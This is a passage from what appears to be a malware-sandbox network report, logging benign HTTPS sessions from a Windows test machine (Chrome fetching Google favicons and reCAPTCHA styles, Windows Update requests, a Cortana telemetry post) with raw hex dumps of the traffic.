rl(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBxc4EsA.woff2) format('woff2'); unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;}/* vietnamese */@font-face { font-family: 'Roboto'; font-style: normal
2024-02-21 07:14:11 UTC	824	IN	Data Raw: 2c 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 79 69 4e 57 33 52 39 6a 6b 79 4c 56 50 35 2d 45 45 5a 4c 44 7a 55 74 41 2f 73 74 79 6c 65 73 5f 5f 6c 74 72 2e 63 73 73 22 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 2d 63 50 75 5a 77 73 30 41 79 66 4a 32 45 77 4b 57 5a 79 32 34 51 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 20 3d 20 27 68 74 74 Data Ascii: , U+FEFF, U+FFFD;}</style><link rel="stylesheet" type="text/css" href="https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/styles__ltr.css"><script nonce="-cPuZws0AyfJ2EwKWZy24Q" type="text/javascript">window['__recaptcha_api'] = 'htt
2024-02-21 07:14:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49730	142.250.65.228	443	7220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:11 UTC	1178	OUT	GET /favicon.ico HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
2024-02-21 07:14:12 UTC	706	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 5430 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 21 Feb 2024 02:44:51 GMT Expires: Thu, 29 Feb 2024 02:44:51 GMT Cache-Control: public, max-age=691200 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT Content-Type: image/x-icon Vary: Accept-Encoding Age: 16161 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-02-21 07:14:12 UTC	546	IN	Data Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff Data Ascii: h& ( 0.v]X:X:rY
2024-02-21 07:14:12 UTC	1252	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f7 a6 75 ff ff ff ff ff fd fd fd f9 fd fd fd fa ff ff ff ff 0b be fb ff 05 bc fb ff b6 ec fe ff ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f7 aa 7b ff ff ff ff ff fd fd fd f9 fd fd fd db ff ff ff ff 35 c9 fc ff 0a b2 f9 ff 6b a4 f6 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea Data Ascii: BBBBBuBBBBB{5k7R8F2Vb5C
2024-02-21 07:14:12 UTC	1252	IN	Data Raw: de ee d8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd e8 fe fe fe 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 24 fd fd fd ea ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff eb f5 e7 ff 8f c6 7b ff 54 a9 36 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 7e be 67 ff dd ee d7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd e8 ff ff ff 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd d3 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c4 e1 b9 ff 5c ac 3e ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 Data Ascii: /${T6S4S4S4S4S4S4S4S4S4~g"\>S4S4S4S4S4S4S4S4S4S4
2024-02-21 07:14:12 UTC	1252	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fa c8 aa ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff 07 bd fb ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 7d dc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd f9 fd fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff 07 bd fb ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 7d dc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: BBBBBBBBBBB}BBBBBBBBBBB}
2024-02-21 07:14:12 UTC	1128	IN	Data Raw: ff ff ff ff a0 a7 f5 ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 81 8a f2 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 0b fd fd fd d5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b5 ba f7 ff 3e 4b eb ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 3f 4c eb ff ba bf f8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 26 fd fd fd eb ff ff ff Data Ascii: 5C5C5C5C5C5C5C5C5C5C5C5C5C5C5C>K5C5C5C5C5C5C5C5C5C5C5C5C?L&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49731	142.251.40.100	443	7220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:12 UTC	721	OUT	GET /favicon.ico HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
2024-02-21 07:14:12 UTC	706	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 5430 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 21 Feb 2024 02:44:51 GMT Expires: Thu, 29 Feb 2024 02:44:51 GMT Cache-Control: public, max-age=691200 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT Content-Type: image/x-icon Vary: Accept-Encoding Age: 16161 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-02-21 07:14:12 UTC	546	IN	Data Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff Data Ascii: h& ( 0.v]X:X:rY
2024-02-21 07:14:12 UTC	1252	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f7 a6 75 ff ff ff ff ff fd fd fd f9 fd fd fd fa ff ff ff ff 0b be fb ff 05 bc fb ff b6 ec fe ff ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f7 aa 7b ff ff ff ff ff fd fd fd f9 fd fd fd db ff ff ff ff 35 c9 fc ff 0a b2 f9 ff 6b a4 f6 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea Data Ascii: BBBBBuBBBBB{5k7R8F2Vb5C
2024-02-21 07:14:12 UTC	1252	IN	Data Raw: de ee d8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd e8 fe fe fe 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 24 fd fd fd ea ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff eb f5 e7 ff 8f c6 7b ff 54 a9 36 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 7e be 67 ff dd ee d7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd e8 ff ff ff 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd d3 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c4 e1 b9 ff 5c ac 3e ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 Data Ascii: /${T6S4S4S4S4S4S4S4S4S4~g"\>S4S4S4S4S4S4S4S4S4S4
2024-02-21 07:14:12 UTC	1252	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fa c8 aa ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff 07 bd fb ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 7d dc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd f9 fd fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff 07 bd fb ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 7d dc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: BBBBBBBBBBB}BBBBBBBBBBB}
2024-02-21 07:14:12 UTC	1128	IN	Data Raw: ff ff ff ff a0 a7 f5 ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 81 8a f2 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 0b fd fd fd d5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b5 ba f7 ff 3e 4b eb ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 3f 4c eb ff ba bf f8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 26 fd fd fd eb ff ff ff Data Ascii: 5C5C5C5C5C5C5C5C5C5C5C5C5C5C5C>K5C5C5C5C5C5C5C5C5C5C5C5C?L&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49732	13.85.23.86	443

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:21 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lm7cla3483ezND7&MD=O4BV1say HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-02-21 07:14:21 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 982cb053-f223-471a-b58a-ced477206b82 MS-RequestId: f6cf5d68-7393-4cb0-aa73-c48b2838a0ba MS-CV: IJa6rh2JGUOmYiXJ.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 21 Feb 2024 07:14:20 GMT Connection: close Content-Length: 24490
2024-02-21 07:14:21 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-02-21 07:14:21 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.5	49735	23.1.237.91	443

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:21 UTC	2148	OUT	POST /threshold/xls.aspx HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH Content-type: text/xml X-Agent-DeviceId: 01000A410900D492 X-BM-CBT: 1696428841 X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A410900D492 X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Content-Length: 2484 Connection: Keep-Alive Cache-Control: no-cache Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1708499629007&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
2024-02-21 07:14:21 UTC	1	OUT	Data Raw: 3c Data Ascii: <
2024-02-21 07:14:21 UTC	2483	OUT	Data Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49 Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
2024-02-21 07:14:21 UTC	476	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 161384B5FE1A42C8B2C97B71F26D7175 Ref B: BY3EDGE0311 Ref C: 2024-02-21T07:14:21Z Date: Wed, 21 Feb 2024 07:14:21 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.57ed0117.1708499661.1b5a1983

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49739	13.85.23.86	443

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:15:01 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lm7cla3483ezND7&MD=O4BV1say HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-02-21 07:15:01 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: 44937d37-52ee-4d79-b579-3c16b7d17eb7 MS-RequestId: 540be2a4-2fa0-46fe-aa7a-919711213314 MS-CV: RxNpCubBnkq24kEK.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 21 Feb 2024 07:15:01 GMT Connection: close Content-Length: 25457
